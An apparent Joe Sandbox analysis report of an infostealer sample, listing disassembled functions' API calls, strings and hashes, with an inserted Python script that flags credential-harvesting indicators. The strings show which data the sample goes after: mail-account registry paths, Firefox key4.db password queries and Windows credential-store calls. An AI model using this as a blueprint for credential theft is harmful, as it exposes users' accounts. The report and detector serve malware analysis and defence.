                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                                                                                                          • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                          • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                          • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                                            • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                                            • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                          • API String ID: 1831126014-3814494228
                                                                                                                                                                                                          • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                          • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%
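The per-function records above follow one layout: an APIs list (direct calls and "Part of subcall function" entries with their addresses), an optional Strings list, the memory-dump source, a Similarity group whose String ID field joins the function's strings with "$", the opcode/instruction fuzzy hashes, and a Uniqueness score. When a report like this runs to thousands of such blocks, the useful triage step is to pull them into structured records and flag the ones carrying the credential-access indicators the report itself records for this sample (the Internet Account Manager and OMI Account Manager registry paths, and the imap:// and mailbox:// account formats). The Python below is an added example, not part of this report or of Joe Sandbox; the sample input is copied (abridged) from the two preceding blocks, and the section header names and line regexes are assumptions about the listing layout, not a documented Joe Sandbox export format.

```python
"""Parse Joe Sandbox per-function listings into records for triage (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Assumed line shapes: "• name.MODULE(args), ref: ADDR" and
# "• Part of subcall function ADDR: name.MODULE(args), ref: ADDR" (args optional).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Similarity", "Uniqueness"}   # assumed from the listing layout

# Strings this report records in the sample's String IDs; a block that
# references one of them touches stored mail-account data.
MAIL_INDICATORS = (
    r"Software\Microsoft\Internet Account Manager\Accounts",
    r"Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
    "imap://%s@%s",
    "mailbox://%s@%s",
)


@dataclass
class ApiRef:
    name: str
    module: str
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when listed as "Part of subcall function"


@dataclass
class FunctionBlock:
    apis: List[ApiRef] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)   # Similarity / source fields
    uniqueness: Optional[float] = None


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split a listing into FunctionBlock records; each block starts at an 'APIs' line."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()          # the extracted report carries deep indentation
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            section = "APIs"
            continue
        if cur is None or not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiRef(m["name"], m["mod"], m["ref"].upper(), m["sub"]))
            continue
        if section == "Strings":
            cur.strings.append(line.lstrip("• ").strip())
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"].strip()] = m["val"].strip()
    return blocks


def string_ids(block: FunctionBlock) -> List[str]:
    """The report joins String IDs with '$'; a literal '$' inside a string would also split."""
    val = block.fields.get("String ID", "")
    return val.split("$") if val else []


def direct_apis(block: FunctionBlock) -> List[str]:
    """Calls made by the function itself, excluding 'Part of subcall' entries."""
    return [a.name for a in block.apis if a.subcall is None]


def mail_credential_hits(blocks: List[FunctionBlock],
                         indicators: Tuple[str, ...] = MAIL_INDICATORS) -> List[Tuple[str, List[str]]]:
    """(Opcode ID, matched indicator strings) for every block that references one."""
    hits = []
    for b in blocks:
        matched = [s for s in string_ids(b) if s in indicators]
        if matched:
            hits.append((b.fields.get("Opcode ID", ""), matched))
    return hits


# Constructed sample: two blocks copied from this report, second one abridged.
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 2360744853-2229823034
• Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
• memset.MSVCRT ref: 00402C8F
  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
• RegCloseKey.ADVAPI32(?), ref: 00402D91
  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
• memset.MSVCRT ref: 00402CE9
• sprintf.MSVCRT ref: 00402D02
• sprintf.MSVCRT ref: 00402D40
  • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
  • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Closememset$sprintf$EnumOpen
• String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
• API String ID: 1831126014-3814494228
• Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
Uniqueness

Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for opcode_id, matched in mail_credential_hits(parse_blocks(SAMPLE)):
        print(opcode_id[:16], matched)
```

Running it over a whole report rather than the sample is a matter of feeding the page text to `parse_blocks`; the Opcode ID returned with each hit is the stable key to pivot on across other reports' listings, and `direct_apis` separates what a function calls itself from what its callees do, which is what you want when deciding whether a block is the harvesting routine or merely a caller of it.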

APIs
• strchr.MSVCRT ref: 0040FA5C
• _mbscpy.MSVCRT ref: 0040FA6A
  • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
  • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
  • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
• _mbscpy.MSVCRT ref: 0040FABA
• _mbscat.MSVCRT ref: 0040FAC5
• memset.MSVCRT ref: 0040FAA1
  • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                                            • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                          • API String ID: 912701516-1821301763
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• key4.db, xrefs: 00406632
• C@, xrefs: 00406625
• SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
• SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memcmpmemsetstrlen
• String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
• API String ID: 2950547843-1835927508
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
• memset.MSVCRT ref: 00403010
  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
• memset.MSVCRT ref: 0040305D
• sprintf.MSVCRT ref: 00403075
• memset.MSVCRT ref: 004030A6
• RegCloseKey.ADVAPI32(?), ref: 004030EE
• RegCloseKey.ADVAPI32(?), ref: 00403117
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memset$Close$EnumOpensprintf
• String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
• API String ID: 3672803090-3168940695
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
• String ID: 0$6
• API String ID: 3540791495-3849865405
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy$strlen
• String ID: -journal$-wal$immutable$nolock
• API String ID: 2619041689-3408036318
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??3@$strlen
• String ID:
• API String ID: 4288758904-3916222277
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
• wcslen.MSVCRT ref: 004084C2
• _wcsncoll.MSVCRT ref: 00408506
• memset.MSVCRT ref: 0040859A
• memcpy.MSVCRT ref: 004085BE
• wcschr.MSVCRT ref: 00408612
• LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
  • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
• String ID: J$Microsoft_WinInet
• API String ID: 1371990430-260894208
Uniqueness
• Uniqueness Score: -1.00%

APIs
• UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
• UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
• UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
• memcpy.MSVCRT ref: 004102D6
Strings
• 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
• 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
• 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
• 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
Similarity
• API ID: FromStringUuid$memcpy
• String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
• API String ID: 2859077140-2022683286
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
• FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
• strlen.MSVCRT ref: 00406A6A
• _mbscpy.MSVCRT ref: 00406A7A
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
• _mbscpy.MSVCRT ref: 00406A94
Strings
Similarity
• API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2881943006-572158859
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
• FreeLibrary.KERNEL32(00000000), ref: 00404AD9
• MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
Strings
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
• _mbscpy.MSVCRT ref: 004093F7
• _mbscpy.MSVCRT ref: 00409407
• GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
  • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
Strings
Similarity
• API ID: PrivateProfile_mbscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 888011440-2039793938
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
• unable to open database: %s, xrefs: 0042E21C
• database is already attached, xrefs: 0042E0DD
• database %s is already in use, xrefs: 0042E014
• cannot ATTACH database within transaction, xrefs: 0042DFAC
• too many attached databases - max %d, xrefs: 0042DF97
• out of memory, xrefs: 0042E235
• attached databases must use the same text encoding as main database, xrefs: 0042E12C
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
                                                                                                                                                                                                          • Opcode ID: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                          • Instruction ID: c7e7a29d1825d2e945301ab40bb758a3ed070f64a4837571caa387bbb47581b8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFA1BC70608311DFD720DF2AE441A6BBBE4BF88318F54492FF48987252D778E945CB9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
• ??2@YAPAXI@Z.MSVCRT ref: 004099C0
• ??2@YAPAXI@Z.MSVCRT ref: 004099DC
• memcpy.MSVCRT ref: 00409A04
• memcpy.MSVCRT ref: 00409A21
• ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
• ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
• ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
Strings
Similarity
• API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
• String ID: $$d
• API String ID: 2915808112-2066904009
• Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
• Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
• Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
• Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
• strchr.MSVCRT ref: 0040326D
Strings
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
• API String ID: 1348940319-1729847305
• Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
• Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
• Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
• Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
• Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
• Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
• Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
• Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetClientRect.USER32(?,?), ref: 00405E58
• GetWindow.USER32(?,00000005), ref: 00405E70
• GetWindow.USER32(00000000), ref: 00405E73
  • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
  • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
• GetWindow.USER32(00000000,00000002), ref: 00405E7F
• GetDlgItem.USER32(?,000003ED), ref: 00405E96
• GetDlgItem.USER32(?,00000000), ref: 00405EA8
• GetDlgItem.USER32(?,00000000), ref: 00405EBA
• GetDlgItem.USER32(?,000003ED), ref: 00405EC8
• SetFocus.USER32(00000000), ref: 00405ECB
Similarity
• API ID: Window$Item$Rect$ClientFocusPoints
• String ID:
• API String ID: 2432066023-0
• Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
• Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
• Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
• Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
• memset.MSVCRT ref: 0040F396
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
• _strnicmp.MSVCRT ref: 0040F3C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
Strings
Similarity
• API ID: ByteCharMultiWide$Version_strnicmpmemset
• String ID: WindowsLive:name=*$windowslive:name=
• API String ID: 945165440-3589380929
• Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
• Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
• Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
• Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
  • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
  • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
• strchr.MSVCRT ref: 00403711
• _mbscpy.MSVCRT ref: 0040373A
• _mbscpy.MSVCRT ref: 0040374A
• strlen.MSVCRT ref: 0040376A
• sprintf.MSVCRT ref: 0040378E
• _mbscpy.MSVCRT ref: 004037A4
Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                                          • String ID: %s@gmail.com
                                                                                                                                                                                                          • API String ID: 500647785-4097000612
                                                                                                                                                                                                          • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                          • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00409239
                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                                                                                                          • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                          • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405A89
